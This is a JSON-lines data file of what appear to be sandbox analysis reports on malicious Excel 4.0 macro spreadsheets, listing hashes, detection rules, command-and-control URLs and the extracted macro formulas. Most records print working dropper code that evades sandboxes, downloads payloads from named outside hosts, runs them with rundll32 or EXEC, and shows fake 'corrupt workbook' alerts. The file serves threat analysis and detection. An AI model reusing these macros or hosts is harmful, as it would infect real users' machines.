{"version":"0.2","sample":{"sample":"","kind":"file","target":"baa559b22c0ba5e30bdcefc8e12af2473b9106d5c09ae9d16e198ac26cf1d3e7"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"baa559b22c0ba5e30bdcefc8e12af2473b9106d5c09ae9d16e198ac26cf1d3e7","filesize":113664,"md5":"b45a7b3a954ea6fe7ff56a4dee764c10","sha1":"f3a8d9739fd53d2937cbc6525f54504cbeb4f7a7","sha256":"baa559b22c0ba5e30bdcefc8e12af2473b9106d5c09ae9d16e198ac26cf1d3e7","sha512":"c163d108ac890f8171ebe7d3fa1cb3550531159453b5c654bc51c60c8db8e4a2eaa4b1df5576c498b18cfacc1c4488e07f1e3eeae8ef264b94705c39dd7f541d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"baa559b22c0ba5e30bdcefc8e12af2473b9106d5c09ae9d16e198ac26cf1d3e7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CoKD7nxbXp\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bab6a2f84a10663df915242488543d704a6ecbc6d62827080852468a8ae4a41b"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"bab6a2f84a10663df915242488543d704a6ecbc6d62827080852468a8ae4a41b","filesize":185344,"md5":"81e5dd6695af43a92b35d5c1bdb9ac49","sha1":"b124f2196526e1271fcc6604a8dac28f88db0fde","sha256":"bab6a2f84a10663df915242488543d704a6ecbc6d62827080852468a8ae4a41b","sha512":"3f8a8c30872570fc0d257de8b577e0cbec6be4e48ff8bc61166ad78d3b262064be35981ea93175f1f4aeae826c7c2920675b7d81972e361cfcbc05c3e1f6aab2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bab6a2f84a10663df915242488543d704a6ecbc6d62827080852468a8ae4a41b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"babbbd002dcb1a91d32700c2e46740afecdf00f474ce1f8d15fc1b6ae7a1f259"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"babbbd002dcb1a91d32700c2e46740afecdf00f474ce1f8d15fc1b6ae7a1f259","filesize":144384,"md5":"67c875bba9bebcabb9d0d18fa9d2fd1b","sha1":"ea2eb929f77f7b020010aa973c6a724ac55725f0","sha256":"babbbd002dcb1a91d32700c2e46740afecdf00f474ce1f8d15fc1b6ae7a1f259","sha512":"b9f026a519a39a1dfbb8c052a5629317a68300301e17cd56d97b0ec93b4aee546c283f9fd722c062ffa4a495f50d8e542609063722f507dfe66d36ecf8d8f38c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"babbbd002dcb1a91d32700c2e46740afecdf00f474ce1f8d15fc1b6ae7a1f259.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"YNWTYJieqh\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"badfb409adfe2aa51096cc805fa54beeaeec705a0ea7a5fb1694455d06f7cb77"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"badfb409adfe2aa51096cc805fa54beeaeec705a0ea7a5fb1694455d06f7cb77","filesize":185344,"md5":"5d5dc975fbfcc3f720a5840de6f4ad77","sha1":"7c95c79263d7aecb607a22b28a54d51fa86e7bb7","sha256":"badfb409adfe2aa51096cc805fa54beeaeec705a0ea7a5fb1694455d06f7cb77","sha512":"46c330d35579a9c30712088cce85848dea70723b80c0fea1a62385792e34c6641ec57de9226fdc8647b158c202d8f1318c05dfb67c849eb8892f8c1dcfe726ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"badfb409adfe2aa51096cc805fa54beeaeec705a0ea7a5fb1694455d06f7cb77.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"baecc325586e1d9f0cd75056ced027f437408361859cf319bf8f057ba6b1f7aa"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"baecc325586e1d9f0cd75056ced027f437408361859cf319bf8f057ba6b1f7aa","filesize":185344,"md5":"d1b95ce1b4e89272859a9d9f2b26d5ae","sha1":"5becb834bbf085d9c846984350d50c49c598ef91","sha256":"baecc325586e1d9f0cd75056ced027f437408361859cf319bf8f057ba6b1f7aa","sha512":"03bb4372578108ab48ced4d75d6002e9a7c99c7d71d51c35fecff7800cf58cac2a84d3f9261a6fc0e3831969137a740d2816151ad98f0bb18265c9c085bbbcad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"baecc325586e1d9f0cd75056ced027f437408361859cf319bf8f057ba6b1f7aa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb01c7062270b39355a420d045733d39ca8b8b59f35496926d7069457d36fe5b"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"bb01c7062270b39355a420d045733d39ca8b8b59f35496926d7069457d36fe5b","filesize":113664,"md5":"51f7a3a5409415222585090ee9dbef6d","sha1":"1de250232bdb73f93cd8cd4c3695286c50783f52","sha256":"bb01c7062270b39355a420d045733d39ca8b8b59f35496926d7069457d36fe5b","sha512":"a7bdb37666fef0cebe023cb668d40f1533ed6384fc520ba48355862da9caf36e72e43a8461595361cd275751849d73bc2689263ea52ee0f422593b08968ef682","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb01c7062270b39355a420d045733d39ca8b8b59f35496926d7069457d36fe5b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"g8lIrTGpwV\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb0b651c6deeef26cb905f3ddbfd57e13ac7258c45b6534d8f713efa3cab3833"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"bb0b651c6deeef26cb905f3ddbfd57e13ac7258c45b6534d8f713efa3cab3833","filesize":185344,"md5":"fe264a6b39a97e77a7c32e89c4421ca6","sha1":"0668aa13c07821c33e4e692b6e96fb7f1c61dd43","sha256":"bb0b651c6deeef26cb905f3ddbfd57e13ac7258c45b6534d8f713efa3cab3833","sha512":"76c722549c26ba4c485577b9f57106901b1300d210f81b09fa177522cdf32033d78d1bf77abfa29fcac73bf0d1e9d798be57614a8667c45dd79780d7272b1d6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb0b651c6deeef26cb905f3ddbfd57e13ac7258c45b6534d8f713efa3cab3833.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb12033c5e5f90b606b3d2fd9ef88b0660f98c1afa450821c4f99cb370962165"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"bb12033c5e5f90b606b3d2fd9ef88b0660f98c1afa450821c4f99cb370962165","filesize":113664,"md5":"d1195f417d44642f7f686c255b263c19","sha1":"28238facbd91f808f21e0d9f31ba00c7e25a9d6a","sha256":"bb12033c5e5f90b606b3d2fd9ef88b0660f98c1afa450821c4f99cb370962165","sha512":"a2387c3996c84ca692eaf9ff971ccbf0d03ad82608215c1f3606a913d38a414991beaebab1ad9396fb0e73948f736d2fca32d515572a696aacc41efdf98c5842","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb12033c5e5f90b606b3d2fd9ef88b0660f98c1afa450821c4f99cb370962165.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"p23fBB2WfB\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb1780a8710e297fd04407e497f1324657041c1792bdaef07ac9af58a30f8d32"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"bb1780a8710e297fd04407e497f1324657041c1792bdaef07ac9af58a30f8d32","filesize":225280,"md5":"587b620e7fecb5e8cf32c65fa7a2b8cf","sha1":"8d63869183b34408de5b719b4d248179cf2ddee9","sha256":"bb1780a8710e297fd04407e497f1324657041c1792bdaef07ac9af58a30f8d32","sha512":"a9bffbb651b1b498c606daecde1174153fb146c28a53060d4c4b599a5da6fc290af62b1799eede773edd0bf20c4e6ba450adc768c80b344ee6142f507a6c3ea9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb1780a8710e297fd04407e497f1324657041c1792bdaef07ac9af58a30f8d32.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BdY4AJO7f8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb23b7673b650a2d0687fcc09ce2e6ff1ba94bf11ffcf4f1ee5a6c1e3630c4f6"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb23b7673b650a2d0687fcc09ce2e6ff1ba94bf11ffcf4f1ee5a6c1e3630c4f6","filesize":196096,"md5":"18d19d18c02282dc1d46de2d971b51c8","sha1":"f974c0062009aa22e4257e096f22bd68bedf0573","sha256":"bb23b7673b650a2d0687fcc09ce2e6ff1ba94bf11ffcf4f1ee5a6c1e3630c4f6","sha512":"31a552a68c2b6c25302dbee2731be24e4881125851a5269c7abbbfc8b34da46c78f928cec8dc37bebac89da990d31d349dc2e370e9d65821a92da2a86d05b053","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb23b7673b650a2d0687fcc09ce2e6ff1ba94bf11ffcf4f1ee5a6c1e3630c4f6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nFOPEN(\"C:\\Users\\Public\\2.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(GET.WORKSPACE(42),EXEC(GET.NOTE(R$34C$3)),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb270eb87b909960163f831a952003cc998e3650b1a962cef7817c22dab120b6"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb270eb87b909960163f831a952003cc998e3650b1a962cef7817c22dab120b6","filesize":167936,"md5":"2504081b75891ce2ba2c11b6a23c689e","sha1":"3b7f2653edb5f2ec6a8aaee441ec2cbddb6a1bf8","sha256":"bb270eb87b909960163f831a952003cc998e3650b1a962cef7817c22dab120b6","sha512":"520296ff0ca9dcee898f14b0418def214280c571d93756682fc71a8e5ab177bf66e13de5c4a67f7ab2ff78135ddaa78304bd404fe86392250050d3e96255f955","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb270eb87b909960163f831a952003cc998e3650b1a962cef7817c22dab120b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4FADVTYzr5\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb34455937948544e55f7ec11f24749e6aa1b944bdd8b815310234c609ef7041"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb34455937948544e55f7ec11f24749e6aa1b944bdd8b815310234c609ef7041","filesize":168448,"md5":"6cfc20b22d508e26d10413678cd067c7","sha1":"690960be271175a0fd1aa0f5a43cad907c98e357","sha256":"bb34455937948544e55f7ec11f24749e6aa1b944bdd8b815310234c609ef7041","sha512":"b2e669a5d81007293e2ae08a9c331e8afb66abff5d31d67fb2511428e98163900b1af8d7e1bfb58d1d49b52ed172d57075efbbc0880d6e18d2e9c3b9d802e2b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb34455937948544e55f7ec11f24749e6aa1b944bdd8b815310234c609ef7041.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ii7YpDFUrl\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb373bf0c6f501aae8c6b028b87fbec413e3891eaa116cd55102ffe6d1235d0b"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb373bf0c6f501aae8c6b028b87fbec413e3891eaa116cd55102ffe6d1235d0b","filesize":185344,"md5":"6a9c522ca965ae97a4b8ba169f1b7890","sha1":"e17de1708d9cbe0260ec9fa30c5559ae6836317a","sha256":"bb373bf0c6f501aae8c6b028b87fbec413e3891eaa116cd55102ffe6d1235d0b","sha512":"dc3226e4da32e169816a312448f8f3a041df15a33db0183091eaeddb0fc43dc5cee45c11251c391222e1c2b513f7b00a66c7c67b078eecfe769c25c3770da482","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb373bf0c6f501aae8c6b028b87fbec413e3891eaa116cd55102ffe6d1235d0b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb39ce28fa1da689de7fed831655d5ae93be5c46b873f700843f5cc20c27aa00"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb39ce28fa1da689de7fed831655d5ae93be5c46b873f700843f5cc20c27aa00","filesize":185344,"md5":"5e89dee1404a57f9746070ac2b422c41","sha1":"661bd0d7c6d24d4c3184600c28d56e3cfb56bf3a","sha256":"bb39ce28fa1da689de7fed831655d5ae93be5c46b873f700843f5cc20c27aa00","sha512":"0068c0c99f65ba69668e0148fac6f9f350deaf0a289b16a56de541c9a8655bdac65965a3f01237ca12883d6634c04ce42f54a773ce788d280a95a16c345e65f2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb39ce28fa1da689de7fed831655d5ae93be5c46b873f700843f5cc20c27aa00.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"bb3db12616112c86f9c4619f704050be50399db3a298ccdcadf6d9837a61cf93"},"analysis":{"reported":"2020-04-09T16:18:35Z","score":10},"files":[{"filename":"bb3db12616112c86f9c4619f704050be50399db3a298ccdcadf6d9837a61cf93","filesize":212992,"md5":"0277af7ba62bb8d5464aa038639b0ad4","sha1":"fcb56534217db09ca7fee191b9e2a45d86c6f25d","sha256":"bb3db12616112c86f9c4619f704050be50399db3a298ccdcadf6d9837a61cf93","sha512":"0223f4630071b72bae24a14d3cfd993027cce69b3d48998432f92f5608987c1e155687c6822449bd5ed3ea7270c158866900b5ea4c8bc21e3342349f1c821a58","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"bb3db12616112c86f9c4619f704050be50399db3a298ccdcadf6d9837a61cf93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CyY7r7Shgw\",TRUE)\nGOTO(R$0C$17)"}}}]}
